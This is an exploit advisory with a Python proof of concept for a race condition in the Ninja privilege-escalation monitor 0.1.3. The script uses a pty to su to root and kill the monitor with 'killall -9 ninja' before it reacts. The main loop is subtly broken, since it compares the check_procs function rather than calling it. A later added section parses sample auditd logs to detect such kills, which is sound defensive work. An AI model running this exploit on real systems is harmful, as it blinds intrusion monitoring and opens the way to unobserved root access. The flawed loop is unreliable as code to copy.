Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition
Source: http://highjack.github.io/ Author: highjack Published: 2015-04-30
#[Title] Ninja privilege escalation detection and prevention system race condition
#[Author] Ben 'highjack' Sheppard
#[Description] There is a small delay between the time of execution of a command and the time privilege escalation is detected.
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
#[Software Link] http://forkbomb.org/ninja/
#[Date] 29/04/2015
#[Version] 0.1.3
#[Tested on] Kali Linux
   
#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
   
import pty, os, sys, subprocess
pid, fd = pty.fork()
   
#begin config
user = "root"
password  = "mypassword" #change this :)
command = "killall -9 ninja"
#end config
   
   
def usage():
    print """
@@@  @@@  @@@   @@@@@@@@  @@@  @@@       @@@   @@@@@@    @@@@@@@  @@@  @@@  
@@@  @@@  @@@  @@@@@@@@@  @@@  @@@       @@@  @@@@@@@@  @@@@@@@@  @@@  @@@  
@@!  @@@  @@!  !@@        @@!  @@@       @@!  @@!  @@@  !@@       @@!  !@@  
!@!  @!@  !@!  !@!        !@!  @!@       !@!  !@!  @!@  !@!       !@!  @!!  
@!@!@!@!  !!@  !@! @!@!@  @!@!@!@!       !!@  @!@!@!@!  !@!       @!@@!@!   
!!!@!!!!  !!!  !!! !!@!!  !!!@!!!!       !!!  !!!@!!!!  !!!       !!@!!!    
!!:  !!!  !!:  :!!   !!:  !!:  !!!       !!:  !!:  !!!  :!!       !!: :!!   
:!:  !:!  :!:  :!:   !::  :!:  !:!  !!:  :!:  :!:  !:!  :!:       :!:  !:!  
::   :::   ::   ::: ::::  ::   :::  ::: : ::  ::   :::   ::: :::   ::  :::  
 :   : :  :     :: :: :    :   : :   : :::     :   : :   :: :: :   :   ::: 
    
[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
[Author] Ben 'highjack' Sheppard
[URL] http://highjack.github.io/
    
[Description] There is a small delay between the time of execution of a command and the time privilege escalation is detected.
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
 """
    
   
executions = 0
def check_procs():
    p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
    p2 = subprocess.Popen(["grep", "root"],  stdin=p1.stdout,  stdout=subprocess.PIPE)
    p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
    output = p3.communicate()[0]
    if output != "":
        if executions != 0:
            sys.exit(0)
        return True
    else:
        return False
   
def kill_ninja():
    if pid == 0:
        os.execvp("su", ["su", user, "-c", command])
    elif pid > 0:
        try:
            os.read(fd, 1024)
            os.write(fd, password + "\n")
            os.read(fd,1024)
            os.wait()
            os.close(fd)
        except:
            usage()
            print "[+] Ninja is terminated"
            sys.exit(0)
               
   
while True:
    kill_ninja()
    if (check_procs == True):
        executions = executions + 1
        kill_ninja()
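
Because the PoC above ends the monitor itself, a record of the `su -c "killall -9 ninja"` execution has to come from a source the monitor does not control. The following is an added detection example, not part of the original PoC or of Ninja: it assumes auditd is logging execve calls (the page does not mention auditd), and the log lines, function names and `KILLERS` list are constructed for illustration.

```python
import re

# Constructed auditd EXECVE records (sample data, not from a real host).
# auditd hex-encodes any argument containing spaces, as in event 502.
SAMPLE_LOG = """\
type=EXECVE msg=audit(1430300000.101:501): argc=2 a0="ps" a1="aux"
type=EXECVE msg=audit(1430300000.214:502): argc=4 a0="su" a1="root" a2="-c" a3=6B696C6C616C6C202D39206E696E6A61
type=EXECVE msg=audit(1430300000.398:503): argc=3 a0="killall" a1="-9" a2="ninja"
type=EXECVE msg=audit(1430300002.000:504): argc=2 a0="su" a1="backup"
"""

EVENT_RE = re.compile(r'msg=audit\(([\d.]+):(\d+)\)')
ARG_RE = re.compile(r'\ba(\d+)=("([^"]*)"|(?:[0-9A-Fa-f]{2})+)')
KILLERS = {"kill", "killall", "pkill"}  # assumed list of process-killing tools

def parse_execve(line):
    """Return (event_id, argv) for an EXECVE record, or None for other lines."""
    event = EVENT_RE.search(line)
    if not line.startswith("type=EXECVE") or not event:
        return None
    args = {}
    for idx, raw, quoted in ARG_RE.findall(line):
        if raw.startswith('"'):
            args[int(idx)] = quoted
        else:  # unquoted value: hex-encoded argument
            args[int(idx)] = bytes.fromhex(raw).decode("utf-8", "replace")
    return event.group(2), [args[i] for i in sorted(args)]

def targets_monitor(argv, monitor="ninja"):
    """True if argv, or a shell string passed via -c, kills the monitor by name."""
    words = list(argv)
    if "-c" in argv[:-1]:
        words += argv[argv.index("-c") + 1].split()
    names = [w.rsplit("/", 1)[-1] for w in words]
    # Kill-by-PID carries no process name; that needs PID correlation (not done here).
    return any(n in KILLERS for n in names) and monitor in names

def find_monitor_kills(log_text, monitor="ninja"):
    """Collect (event_id, argv) for every EXECVE record that targets the monitor."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_execve(line)
        if parsed and targets_monitor(parsed[1], monitor):
            hits.append(parsed)
    return hits

if __name__ == "__main__":
    for event_id, argv in find_monitor_kills(SAMPLE_LOG):
        print("audit event %s targets the monitor: %r" % (event_id, argv))
```

Pairing such a hit with a liveness check on the monitor process, run from a separate supervisor, covers the case where the kill has already succeeded.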

 